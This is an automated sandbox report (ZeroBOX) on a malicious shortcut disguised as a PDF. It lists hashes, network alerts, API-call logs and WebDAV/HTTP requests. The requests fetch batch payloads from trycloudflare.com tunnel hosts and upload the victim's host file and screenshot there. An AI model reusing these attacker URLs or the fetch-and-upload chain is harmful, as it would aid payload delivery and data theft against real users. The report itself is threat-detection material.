Summary | ZeroBOX

doc01585520250114102531.pdf.lnk

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate privileges DNS Code injection PWS Sniff Audio Steal credential GIF Format AntiDebug Lnk Format PNG Format AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 April 16, 2025, 11:06 a.m. April 16, 2025, 11:08 a.m.
Size 2.7KB
Type MS Windows shortcut, Points to a file or directory, Has Working directory, Icon number=11, Archive, ctime=Sun Apr 13 12:44:06 2025, mtime=Sun Apr 13 12:29:50 2025, atime=Sun Apr 13 12:29:50 2025, length=101, window=hide
MD5 bfe2f106c5a937a00509f9ba9f6c916e
SHA256 5f0ff028fe981ee258397cb0a1bbefc065126d4bf5d7a80d5fe78720f1179d4e
CRC32 BEE5F515
ssdeep 48:8zWa5E8XdQBW0XuHFHxE8D7m22JWO6c22WRE8z:8zKIuuleuVCEfeK
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49173 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
UDP 192.168.56.102:63709 -> 164.124.101.2:53 2034552 ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) Potentially Bad Traffic
TCP 192.168.56.102:49173 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49173 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49197 -> 217.6.220.73:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49199 -> 217.6.220.73:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49183 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49183 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49183 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49192 -> 217.6.220.73:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49207 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
UDP 192.168.56.102:51405 -> 164.124.101.2:53 2034552 ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) Potentially Bad Traffic
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
UDP 192.168.56.102:56630 -> 164.124.101.2:53 2034552 ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) Potentially Bad Traffic
TCP 192.168.56.102:49193 -> 217.6.220.73:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49181 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49181 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49181 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49220 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49220 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49220 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49224 -> 104.16.231.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49224 -> 104.16.231.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49224 -> 104.16.231.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49296 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49296 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49296 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49223 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49223 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49223 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow | Version | Issuer | Subject | Fingerprint
192.168.56.102:49170 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49173 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49162 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49163 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49183 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49207 -> 104.16.230.132:443 | TLSv1 | None | None | None
192.168.56.102:49209 -> 104.16.231.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49181 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49196 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49221 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49220 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49222 -> 104.16.231.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49250 -> 104.16.231.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49224 -> 104.16.231.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49296 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49223 -> 104.16.230.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49259 -> 104.16.231.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
192.168.56.102:49290 -> 104.16.231.132:443 | TLSv1 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94

Time & API Arguments Status Return Repeated

GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent | 0 0
IsDebuggerPresent | 0 0
IsDebuggerPresent | 0 0
IsDebuggerPresent | 0 0
IsDebuggerPresent | 0 0
IsDebuggerPresent | 0 0
IsDebuggerPresent | 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW | buffer: '\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\32' CMD.EXE was started with the above path as the current directory. UNC paths are not | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: supported. Defaulting to Windows directory. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: C:\Windows> | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: '■' is not recognized as an internal or external command, operable program or batch file. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: '\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\32' CMD.EXE was started with the above path as the current directory. UNC paths are not | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: supported. Defaulting to Windows directory. | console_handle: 0x0000000b | 1 1 0
WriteConsoleA | buffer: Watchdog is active... | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: C:\Windows> | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: '■' is not recognized as an internal or external command, operable program or batch file. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: The filename, directory name, or volume label syntax is incorrect. | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: '\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\32' CMD.EXE was started with the above path as the current directory. UNC paths are not | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: supported. Defaulting to Windows directory. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: U: was deleted successfully. | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000f | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000f | 1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605788 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605e08 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605e08 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605e08 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006058c8 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006058c8 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006058c8 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006058c8 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006058c8 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006058c8 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605888 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605888 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605888 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605b88 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605b88 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605b88 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605fc8 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605b88 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605b88 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605b88 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605b88 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605b88 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605b88 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605b88 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605308 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605c48 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x00605c48 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x0060de50 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006690a0 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006690a0 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006690a0 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006692a0 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006692a0 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006692a0 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006692a0 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006692a0 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER> | crypto_handle: 0x006692a0 | flags: 0 | crypto_export_handle: 0x00000000 | blob_type: 6 | 1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx | 1 1 0
request GET https://achievements-plates-station-gaming.trycloudflare.com/tra.bat
request PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/DavWWWRoo
request PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/32
request PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/final.bat
request GET https://achievements-plates-station-gaming.trycloudflare.com/final.bat
request GET https://divide-snow-pound-clip.trycloudflare.com/b.txt
request LOCK https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request GET https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request PROPPATCH https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC.txt
request UNLOCK https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request PROPFIND https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request LOCK https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request GET https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request UNLOCK https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request PROPFIND https://divide-snow-pound-clip.trycloudflare.com/
request HEAD https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request PROPPATCH https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request PUT https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request HEAD https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request PROPPATCH https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request PUT https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request PROPFIND https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request PROPFIND https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/update.bat
request PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory | process_identifier: 3048 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 0 | length: 4096 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x72d52000 | process_handle: 0xffffffff | 1 0 0
NtProtectVirtualMemory | process_identifier: 3048 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 0 | length: 4096 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x72bd3000 | process_handle: 0xffffffff | 1 0 0
NtProtectVirtualMemory | process_identifier: 1688 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 0 | length: 4096 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x72d52000 | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 1245184 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 0 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02a50000 | allocation_type: 8192 (MEM_RESERVE) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02b40000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
